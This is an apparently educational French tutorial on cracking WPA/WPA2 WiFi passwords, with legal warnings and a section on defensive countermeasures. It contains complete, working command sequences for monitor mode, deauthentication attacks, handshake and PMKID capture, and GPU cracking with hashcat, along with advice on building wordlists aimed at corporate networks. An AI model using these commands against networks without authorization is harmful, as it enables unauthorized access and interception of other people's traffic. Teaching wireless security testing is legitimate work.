Attaques de mots de passe de réseaux sans fil
Capture et cassage de la sécurité WPA/WPA2
Ce que vous allez découvrir
🎯 Pourquoi c'est important
L'évaluation de la sécurité des réseaux sans fil représente un composant critique des tests d'intrusion modernes. Les organisations déploient des réseaux WiFi dans toutes leurs installations, souvent sans comprendre pleinement les implications de sécurité. Le chiffrement WPA2 et WPA3 fournit une protection cryptographique solide, mais les mots de passe faibles restent la vulnérabilité fondamentale qui permet l'accès non autorisé au réseau. Les professionnels de la sécurité ont besoin de compétences en cassage de mots de passe sans fil pour évaluer la posture de sécurité réelle des déploiements WiFi, identifier les authentifications faibles et démontrer la faisabilité des attaques avant que des acteurs malveillants n'exploitent ces faiblesses pour obtenir l'accès au réseau, intercepter le trafic ou pivoter vers les systèmes internes.
🔍 Ce que vous allez apprendre
Vous maîtriserez les outils professionnels de cassage de mots de passe sans fil incluant aircrack-ng, hashcat, hcxdumptool et wifite2, comprendrez la capture et le cassage du handshake 4-way WPA/WPA2, apprendrez les techniques modernes d'attaque PMKID qui contournent les exigences d'authentification client, et développerez des compétences en reconnaissance sans fil, capture de paquets et récupération de mots de passe. Ces techniques sont essentielles pour les tests d'intrusion sans fil, les évaluations de sécurité des déploiements WiFi d'entreprise et la compréhension de la surface d'attaque que les réseaux sans fil présentent aux menaces internes et externes.
🚀 Votre première victoire
Dans les 20 prochaines minutes, vous comprendrez comment fonctionne la capture de handshake WPA2, apprendrez à extraire les hachages d'authentification des réseaux sans fil et saurez exactement comment les professionnels de la sécurité cassent les mots de passe WiFi lors des tests d'intrusion.
🔧 Essayez maintenant
Explorons la reconnaissance de réseau sans fil pour comprendre le flux de travail d'attaque (nécessite un adaptateur WiFi avec support du mode moniteur) :
# Installer la suite aircrack-ng (contient les outils sans fil)
# Ubuntu/Debian
sudo apt update && sudo apt install aircrack-ng
# Kali Linux (pré-installé)
# Inclut déjà aircrack-ng, airmon-ng, airodump-ng
# macOS nécessite un adaptateur WiFi spécifique - l'intégré ne fonctionnera pas
# Recommandé : Alfa AWUS036ACH ou adaptateur similaire compatible mode moniteur
# Vérifier votre interface sans fil
iwconfig
# Rechercher : wlan0, wlp2s0, ou similaire
# Activer le mode moniteur sur votre adaptateur sans fil
sudo airmon-ng start wlan0
# Cela crée l'interface mon0 ou wlan0mon
# Scanner les réseaux sans fil à proximité
sudo airodump-ng wlan0mon
# Vous verrez :
# - BSSID (adresse MAC de l'AP)
# - PWR (force du signal)
# - Beacons (annonces de l'AP)
# - CH (canal)
# - ENC (type de chiffrement : WPA, WPA2, WPA3)
# - ESSID (nom du réseau)
# Arrêter le mode moniteur une fois terminé
sudo airmon-ng stop wlan0mon
# NOTE : N'effectuez ces techniques que sur des réseaux que vous possédez
# ou pour lesquels vous avez une permission écrite explicite de tester.
# L'accès non autorisé aux réseaux sans fil viole les lois sur la fraude informatique.Vous verrez : Tous les réseaux sans fil à portée avec leurs configurations de sécurité. Cette phase de reconnaissance identifie les réseaux WPA2 (la cible principale), la force du signal (proximité) et le nombre de clients connectés (pour la capture de handshake). Comprendre ce flux de travail vous prépare aux évaluations de sécurité sans fil professionnelles.
Compétences que vous maîtriserez
✅ Compréhension fondamentale
- Processus d'authentification handshake 4-way WPA/WPA2
- Méthodologie d'extraction et d'attaque PMKID
- Capture et analyse de paquets sans fil
- Protocoles de chiffrement WiFi et vulnérabilités
🔍 Compétences expertes
- Techniques avancées d'attaque par désauthentification
- Cassage de mots de passe sans fil accéléré par GPU
- Évaluation WPA/WPA2-Enterprise
- Pénétration sans fil automatisée avec wifite2
Comprendre la sécurité sans fil
WPA2 (Wi-Fi Protected Access 2) implémente une protection cryptographique robuste utilisant le chiffrement AES-CCMP et une dérivation de clé sécurisée via le handshake 4-way. Lorsqu'un client se connecte à un réseau WPA2, le point d'accès et le client effectuent un échange d'authentification mutuelle qui génère des clés de session uniques dérivées de la clé pré-partagée (PSK) - le mot de passe WiFi. Cet échange de handshake contient du matériel cryptographique qui permet des attaques de cassage de mots de passe hors ligne. Les professionnels de la sécurité capturent ces handshakes et utilisent des outils spécialisés pour tester la force du mot de passe sans nécessiter un accès continu au réseau.
🔐 Handshake 4-way WPA2
AP → Client : ANonce (nombre aléatoire de l'AP)
Client → AP : SNonce + MIC (prouve que le client connaît le mot de passe)
AP → Client : GTK + MIC (clé temporelle de groupe)
Client → AP : ACK (handshake terminé, clés de session dérivées)
La faiblesse
Le handshake 4-way contient suffisamment de matériel cryptographique pour vérifier les suppositions de mots de passe hors ligne, permettant des tests de mots de passe illimités sans interaction ni détection réseau.
L'attaque
Capturer les paquets de handshake pendant l'authentification du client, extraire les hachages cryptographiques, puis appliquer des attaques par dictionnaire ou force brute hors ligne pour récupérer le mot de passe PSK.
Le résultat
Accès complet au réseau avec la capacité d'intercepter le trafic, pivoter vers les systèmes internes et maintenir un accès non autorisé persistant au réseau sans fil.
La spécification du protocole de sécurité WPA2 décrit le processus d'authentification en détail, mais la vulnérabilité fondamentale reste la force du mot de passe. L'implémentation cryptographique est solide - AES-256 fournit un chiffrement robuste et PBKDF2 avec 4 096 itérations crée la clé maîtresse par paire (PMK). Cependant, les mots de passe faibles permettent un cassage réussi quelle que soit la force du chiffrement. Un mot de passe de 8 caractères utilisant des lettres minuscules et des chiffres peut être cassé en quelques heures, tandis qu'un mot de passe de 12+ caractères avec une haute entropie résiste aux capacités de cassage actuelles.
Les attaques PMKID modernes représentent une évolution dans la méthodologie de cassage de mots de passe sans fil. Découverte en 2018 par Jens Steube (créateur de hashcat), l'attaque PMKID exploite un défaut de conception dans l'élément d'information du réseau de sécurité robuste WPA2 (RSN IE). Le point d'accès inclut le PMKID dans la première trame du handshake 4-way, calculé comme HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA). Cette seule trame contient suffisamment d'informations pour effectuer des attaques de mots de passe hors ligne sans nécessiter un handshake complet ou la présence d'un client. Des outils comme hcxdumptool peuvent extraire les PMKIDs directement des points d'accès, simplifiant dramatiquement le flux de travail d'attaque et éliminant le besoin d'attaques de désauthentification de clients.
Outils et techniques
🔨 Suite aircrack-ng : capture traditionnelle de handshake
La suite aircrack-ng représente le standard de l'industrie pour l'évaluation de la sécurité sans fil, fournissant des outils complets pour l'activation du mode moniteur, la capture de paquets, l'analyse de handshake et le cassage de mots de passe. Cette suite inclut airmon-ng (mode moniteur), airodump-ng (capture de paquets), aireplay-ng (désauthentification) et aircrack-ng (cassage de mots de passe).
# Activer le mode moniteur
sudo airmon-ng start wlan0
# Crée l'interface wlan0mon
# Scanner le réseau cible
sudo airodump-ng wlan0mon
# Capturer le handshake sur un canal spécifique
# Remplacer : BSSID par MAC de l'AP, CH par canal, ESSID par nom du réseau
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Dans un autre terminal : Forcer la déauth du client pour capturer le handshake
# Cela force le client à se reconnecter et transmettre le handshake
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Surveiller la sortie airodump-ng pour : "WPA handshake: AA:BB:CC:DD:EE:FF"
# Cela confirme la capture réussie
# Casser le handshake capturé
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap
# Le résultat affiche le mot de passe s'il est trouvé dans la liste
# Exemple de sortie : "KEY FOUND! [ password123 ]"L'approche aircrack-ng nécessite la capture d'un handshake 4-way complet, ce qui nécessite la présence d'un client et une activité de connexion. L'attaque de désauthentification déconnecte de force les clients, les forçant à se reconnecter et transmettre le handshake. Bien qu'efficace, cette approche génère une perturbation réseau notable et peut déclencher la surveillance de sécurité. Le fichier .cap capturé contient les trames EAPOL avec les données d'authentification, que aircrack-ng utilise pour vérifier les suppositions de mots de passe en calculant le PMK et comparant les valeurs dérivées.
⚡ hcxdumptool + hashcat : attaques PMKID modernes
La suite hcxdumptool et hcxtools permet des attaques sans fil modernes basées sur PMKID qui éliminent le besoin de présence client ou de désauthentification. Combinée avec l'accélération GPU de hashcat, cette approche représente l'état de l'art actuel du cassage de mots de passe sans fil.
# Installer hcxdumptool et hcxtools
# Ubuntu/Debian
sudo apt install hcxdumptool hcxtools
# Kali Linux
sudo apt install hcxdumptool hcxtools
# Activer le mode moniteur (si pas déjà activé)
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
# Capturer les PMKIDs des APs à proximité (pas de clients requis !)
sudo hcxdumptool -i wlan0 -o capture.pcapng --enable_status=1
# Exécuter pendant 5-10 minutes pour capturer les PMKIDs de plusieurs APs
# Le statut affiche : PMKIDs capturés, handshakes capturés, APs détectés
# Convertir la capture au format hashcat
hcxpcapngtool -o hashes.hc22000 capture.pcapng
# Examiner les hachages capturés
cat hashes.hc22000
# Format : WPA*02*PMKID*MAC_AP*MAC_CLIENT*ESSID
# Casser avec hashcat (mode 22000 pour WPA-PMKID-PBKDF2)
hashcat -m 22000 -a 0 hashes.hc22000 rockyou.txt
# Cassage accéléré par GPU
hashcat -m 22000 -a 0 hashes.hc22000 rockyou.txt -w 3
# Attaque basée sur des règles pour mutations de mots de passe
hashcat -m 22000 -a 0 hashes.hc22000 rockyou.txt -r rules/best64.rule
# Attaque par masque pour modèles connus
hashcat -m 22000 -a 3 hashes.hc22000 '?u?l?l?l?l?l?l?d?d'L'attaque PMKID fonctionne parce que les points d'accès incluent cette valeur dans le RSN IE de la première trame EAPOL. La divulgation originale de l'attaque PMKID par hashcat a démontré que cette seule trame fournit tout ce qui est nécessaire pour les attaques de mots de passe hors ligne. Contrairement à la capture de handshake traditionnelle, les attaques PMKID ne nécessitent pas de désauthentification de client, les rendant plus furtives et fiables. Cependant, tous les points d'accès ne sont pas vulnérables - certains fabricants ont implémenté des atténuations qui empêchent l'extraction de PMKID.
🚀 wifite2 : attaques sans fil automatisées
Wifite2 fournit un audit de réseau sans fil entièrement automatisé, combinant reconnaissance, capture de handshake, extraction PMKID et cassage de mots de passe dans un flux de travail rationalisé. Cet outil est idéal pour l'évaluation rapide de plusieurs réseaux sans fil.
# Installer wifite2
# Ubuntu/Debian
sudo apt install wifite
# Kali Linux (pré-installé)
wifite --help
# Exécuter une attaque automatisée (gère tout automatiquement)
sudo wifite
# Wifite va :
# 1. Activer le mode moniteur automatiquement
# 2. Scanner les réseaux sans fil
# 3. Vous laisser sélectionner la/les cible(s)
# 4. Tenter d'abord la capture PMKID (rapide, furtive)
# 5. Revenir à la capture de handshake si nécessaire
# 6. Casser les mots de passe automatiquement
# Cibler un réseau spécifique par ESSID
sudo wifite --essid "TargetNetwork"
# Cibler les réseaux par type de chiffrement
sudo wifite --wpa
# Utiliser une liste de mots personnalisée
sudo wifite --dict /path/to/wordlist.txt
# Ignorer le cassage, capturer seulement les handshakes
sudo wifite --no-crack
# Attaquer WPS (si activé sur l'AP)
sudo wifite --wps
# Sortie verbeuse pour le débogage
sudo wifite --verboseWifite2 gère automatiquement la complexité des attaques sans fil, le rendant accessible aux évaluateurs de sécurité qui ont besoin de résultats rapides. L'outil s'intègre avec aircrack-ng, reaver (attaques WPS), bully et d'autres utilitaires pour fournir une couverture d'attaque complète. Il détecte automatiquement la meilleure méthode d'attaque pour chaque cible et gère la récupération d'erreurs. Bien que pratique, comprendre les techniques sous-jacentes reste important pour le dépannage et les scénarios avancés.
🎯 Techniques avancées et optimisation
Les évaluations sans fil professionnelles nécessitent la compréhension des techniques de capture avancées, l'optimisation des attaques et les méthodes de dépannage pour les scénarios difficiles.
# Vérifier la qualité du handshake avant le cassage
# Les handshakes incomplets gaspillent du temps de cassage
aircrack-ng -w test.txt capture-01.cap
# Devrait afficher : "1 handshake" pas "0 handshakes"
# Convertir .cap au format hashcat
hcxpcapngtool -o handshake.hc22000 capture-01.cap
# Nettoyer et optimiser les fichiers de capture
# Supprimer les trames dupliquées et le trafic non-WPA
wpaclean cleaned.cap dirty.cap
# Désauthentification ciblée (client spécifique)
aireplay-ng --deauth 5 -a AP_MAC -c CLIENT_MAC wlan0mon
# Surveillance continue pour plusieurs handshakes
# Utile dans les environnements occupés avec beaucoup de clients
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w multi-capture wlan0mon
# Optimisation hashcat pour cassage sans fil
# Utiliser --force si erreurs OpenCL
hashcat -m 22000 hashes.hc22000 rockyou.txt --force
# Statut pendant le cassage (appuyer sur 's')
# Affiche vitesse, progression, temps estimé
# Attaques par combinaison pour WiFi d'entreprise
# Combiner nom d'entreprise avec modèles courants
hashcat -m 22000 -a 1 hashes.hc22000 company.txt patterns.txt
# Dépannage : Vérifier si le handshake est valide
tshark -r capture-01.cap -Y eapol
# Devrait afficher 4 trames EAPOL (ou minimum 2)La vérification de la qualité du handshake empêche de perdre du temps sur des captures invalides. Un handshake 4-way complet contient quatre trames EAPOL, mais seules les trames 2 et 3 (ou parfois 1 et 2) sont requises pour le cassage de mots de passe. Convertir les captures au format hashcat permet l'accélération GPU, fournissant des améliorations de vitesse de 100-1000x par rapport à aircrack-ng basé sur CPU. Pour les réseaux sans fil d'entreprise, les listes de mots personnalisées incorporant des termes spécifiques à l'entreprise augmentent dramatiquement les taux de réussite.
Contre-mesures défensives
🛡️ Politiques de mots de passe WiFi forts
La sécurité des réseaux sans fil dépend fondamentalement de la force du mot de passe. Les organisations doivent implémenter et appliquer des politiques de mots de passe WiFi robustes qui tiennent compte des capacités de cassage hors ligne. Le cadre de cybersécurité NIST recommande des exigences de mots de passe spécifiques pour les réseaux sans fil qui supposent que les attaquants captureront les handshakes et tenteront le cassage hors ligne.
- Mots de passe de minimum 20 caractères : Les longues phrases de passe résistent efficacement aux attaques par force brute
- Exigences de haute entropie : Mélanger majuscules, minuscules, chiffres, symboles - éviter les mots du dictionnaire
- Rotation régulière des mots de passe : Changer les mots de passe WiFi trimestriellement ou après le départ d'employés
- Mots de passe uniques par SSID : Différents mots de passe pour les réseaux invités, employés et management
🔐 Migration WPA3 et authentification entreprise
WPA3 corrige les vulnérabilités fondamentales du handshake 4-way de WPA2 grâce à l'authentification simultanée des égaux (SAE), qui fournit la confidentialité persistante et la résistance aux attaques par dictionnaire hors ligne. Pour les environnements d'entreprise, WPA2/WPA3-Enterprise avec authentification 802.1X élimine entièrement les vulnérabilités PSK.
- Déploiement WPA3 : Mettre à niveau vers des points d'accès compatibles WPA3 et forcer le mode WPA3 uniquement
- Mode de transition WPA2/WPA3 : Supporter les deux pendant la période de migration, puis désactiver WPA2
- Authentification 802.1X/RADIUS : Identifiants utilisateur individuels au lieu de mots de passe partagés
- Authentification basée sur certificats : EAP-TLS avec certificats client pour la plus haute sécurité
⚡ Détection et prévention d'intrusion sans fil
L'infrastructure sans fil d'entreprise devrait inclure des systèmes de détection d'intrusion sans fil (WIDS) et des systèmes de prévention d'intrusion sans fil (WIPS) qui détectent et répondent aux activités d'attaque incluant les tentatives de capture de handshake, les attaques de désauthentification et les points d'accès non autorisés.
- Détection d'attaque de désauthentification : Surveiller les trames deauth excessives et bloquer les appareils attaquants
- Détection d'AP non autorisé : Identifier les points d'accès non autorisés utilisant les SSIDs de l'entreprise
- Isolation des clients : Empêcher les clients de communiquer directement (stoppe le mouvement latéral)
- Protection des trames de gestion (802.11w) : Protéger cryptographiquement les trames de désauthentification
🔍 Segmentation et surveillance réseau
Les réseaux sans fil devraient être traités comme non fiables et séparés des ressources internes critiques par la segmentation réseau, les VLANs et les politiques de pare-feu qui supposent la compromission du sans fil.
- Segmentation VLAN : Séparer les réseaux sans fil de l'infrastructure filaire
- Politiques de pare-feu : Restreindre l'accès réseau sans fil à internet uniquement, bloquer les ressources internes
- Isolation du réseau invité : Séparation complète avec limitation de bande passante et filtrage de contenu
- Surveillance et journalisation : Journalisation complète des tentatives d'authentification et accès réseau
FAQ
Bases du cassage de mots de passe sans fil
Comment casser un mot de passe WiFi WPA2 ?
Pour casser des mots de passe WiFi WPA2, capturez le handshake 4-way en utilisant des outils comme airodump-ng pendant qu'un client s'authentifie au réseau (utilisez la désauthentification aireplay-ng pour forcer la reconnexion), ou utilisez hcxdumptool pour extraire les PMKIDs qui ne nécessitent pas de présence client. Convertissez les données capturées au format hashcat avec hcxpcapngtool, puis cassez avec hashcat en utilisant des attaques par dictionnaire, des mutations basées sur des règles ou des attaques par masque. L'accélération GPU améliore dramatiquement la vitesse de cassage. Le succès dépend entièrement de la force du mot de passe - les mots de passe faibles se cassent en minutes, les mots de passe forts de 20+ caractères résistent au cassage indéfiniment.
Quelle est la différence entre la capture de handshakes et les attaques PMKID ?
La capture de handshake traditionnelle nécessite d'attendre qu'un client s'authentifie (ou de forcer la reconnexion via désauthentification), puis de capturer l'échange EAPOL 4-way complet entre le client et le point d'accès. Les attaques PMKID, découvertes en 2018, extraient la valeur PMKID directement de la première trame EAPOL du point d'accès sans nécessiter de présence client ou de désauthentification. Les attaques PMKID sont plus rapides, plus furtives et plus fiables, mais tous les points d'accès ne sont pas vulnérables - certains fabricants ont corrigé cela. Utilisez hcxdumptool pour les attaques PMKID et la suite aircrack-ng pour la capture de handshake traditionnelle.
Quel adaptateur WiFi fonctionne le mieux pour le cassage de mots de passe sans fil ?
Le cassage de mots de passe sans fil nécessite des adaptateurs WiFi qui supportent le mode moniteur et l'injection de paquets. L'Alfa AWUS036ACH (double bande AC1200) est largement recommandé pour les réseaux modernes supportant 2,4GHz et 5GHz avec un excellent support du mode moniteur. L'Alfa AWUS036NHA fonctionne bien pour les réseaux 2,4GHz uniquement. Le TP-Link TL-WN722N v1 (pas v2/v3) est économique pour le 2,4GHz. La plupart des cartes WiFi intégrées des ordinateurs portables ne supportent pas le mode moniteur ou l'injection de paquets. Vérifiez les listes de compatibilité des adaptateurs sans fil avant l'achat.
Implémentation technique
Combien de temps faut-il pour casser différents types de mots de passe WiFi ?
Le temps de cassage varie énormément selon la force du mot de passe et le matériel. Les mots de passe de 8 caractères utilisant des mots du dictionnaire se cassent en secondes à minutes. Les mots de passe de 8-10 caractères avec des types de caractères mixtes peuvent prendre des heures à des jours selon la complexité. Les mots de passe de 12-15 caractères avec haute entropie prennent des semaines à des mois même avec des GPU puissants. Les mots de passe aléatoires de 20+ caractères sont effectivement incassables avec la technologie actuelle. WPA2 utilise PBKDF2 avec 4 096 itérations ce qui ralentit le cassage par rapport aux autres types de hachage. Les GPU haut de gamme atteignent 300 000-1 000 000 mots de passe/seconde pour WPA2, tandis que les CPU ne gèrent que 1 000-10 000/seconde.
Quelles sont les données minimales de handshake nécessaires pour le cassage de mots de passe ?
Vous avez besoin au minimum des trames EAPOL 2 et 3 (ou parfois 1 et 2) du handshake 4-way pour casser avec succès les mots de passe WPA2. La trame 2 contient le SNonce du client et le MIC (Message Integrity Check) prouvant que le client connaît le mot de passe. La trame 3 contient la confirmation de l'AP. Ces deux trames fournissent suffisamment de matériel cryptographique pour vérifier les suppositions de mots de passe hors ligne. Le handshake 4-way complet contient quatre trames EAPOL, mais toutes ne sont pas requises pour le cassage. Vérifiez la complétude du handshake avec aircrack-ng ou tshark avant de tenter de casser.
Applications pratiques
Pourquoi les attaques de désauthentification échouent-elles parfois à capturer les handshakes ?
Les attaques de désauthentification peuvent échouer pour plusieurs raisons : les appareils clients ne se reconnectent pas immédiatement (les appareils mobiles attendent souvent), la protection des trames de gestion (802.11w) bloque les trames deauth, le client était déjà connecté (envoyez deauth au MAC client spécifique), la force du signal est trop faible (rapprochez-vous de l'AP), ou vous êtes sur le mauvais canal. Utilisez la désauthentification ciblée contre des MACs clients spécifiques au lieu de deauth en broadcast. Assurez-vous que votre adaptateur supporte l'injection de paquets (testez avec aireplay-ng --test). Essayez les attaques PMKID avec hcxdumptool comme alternative qui ne nécessite pas de désauthentification ou de présence client.
Puis-je casser les mots de passe WPA3 de la même manière que WPA2 ?
Non, WPA3 utilise l'authentification simultanée des égaux (SAE) au lieu du handshake 4-way, ce qui fournit la confidentialité persistante et la résistance aux attaques par dictionnaire hors ligne. Le handshake SAE n'expose pas les données de vérification de mot de passe dans les paquets capturés, rendant les méthodes de cassage WPA2 traditionnelles inefficaces. WPA3 est vulnérable aux attaques par canal auxiliaire et aux défauts d'implémentation (comme les vulnérabilités Dragonblood découvertes en 2019), mais ceux-ci nécessitent des techniques d'attaque différentes du cassage de mots de passe WPA2. Les organisations devraient toujours utiliser des mots de passe forts avec WPA3 comme défense en profondeur, mais la conception cryptographique de WPA3 améliore significativement la résistance aux attaques de cassage de mots de passe.
Quels modèles de mots de passe fonctionnent le mieux pour le cassage de WiFi d'entreprise ?
Les réseaux WiFi d'entreprise utilisent souvent des modèles de mots de passe prévisibles : nom de l'entreprise + année, département + "WiFi" + année, noms de projets + trimestres, ou identifiants de bâtiment/étage. Créez des listes de mots personnalisées à partir de la collecte OSINT - site web de l'entreprise, profils LinkedIn, communiqués de presse, noms de produits, emplacements de bureaux. Les modèles courants incluent CompanyName2024, OfficeWiFi2024!, DeptSecure2024, Building1Guest. Utilisez les règles hashcat pour générer des mutations (majuscules, l33t speak, ajout d'année, suffixes de caractères spéciaux). Les attaques par combinaison joignant des termes d'entreprise avec des mots de passe courants sont très efficaces. Ciblez d'abord les réseaux invités car ils ont généralement des mots de passe plus faibles que les réseaux employés.
Le cassage de mots de passe sans fil est-il légal ?
Le cassage de mots de passe sans fil n'est légal que sur les réseaux que vous possédez ou pour lesquels vous avez une permission écrite explicite de tester. L'accès non autorisé aux réseaux sans fil viole le Computer Fraud and Abuse Act (CFAA) aux États-Unis et des lois similaires à l'échelle mondiale. Même capturer des handshakes sans autorisation peut constituer une interception illégale. Les testeurs d'intrusion professionnels obtiennent une autorisation écrite détaillée (règles d'engagement) avant les évaluations de sécurité sans fil. Tester sur votre propre réseau domestique est légal. Utiliser le WiFi sans permission, même s'il n'est pas chiffré, est illégal dans la plupart des juridictions. Obtenez toujours une autorisation appropriée, maintenez la documentation et restez dans le périmètre défini des tests.
🎯 Vous maîtrisez le cassage de mots de passe sans fil !
Vous comprenez maintenant les mécanismes d'authentification WPA/WPA2, pouvez capturer des handshakes 4-way et des PMKIDs, et savez comment casser les mots de passe sans fil en utilisant des outils professionnels comme aircrack-ng, hashcat et hcxdumptool. Ces compétences sont essentielles pour les tests d'intrusion sans fil, les évaluations de sécurité des déploiements WiFi d'entreprise et la compréhension de la surface d'attaque que les réseaux sans fil présentent aux menaces internes et externes.
Prêt à explorer les techniques de récupération de mots de passe système Windows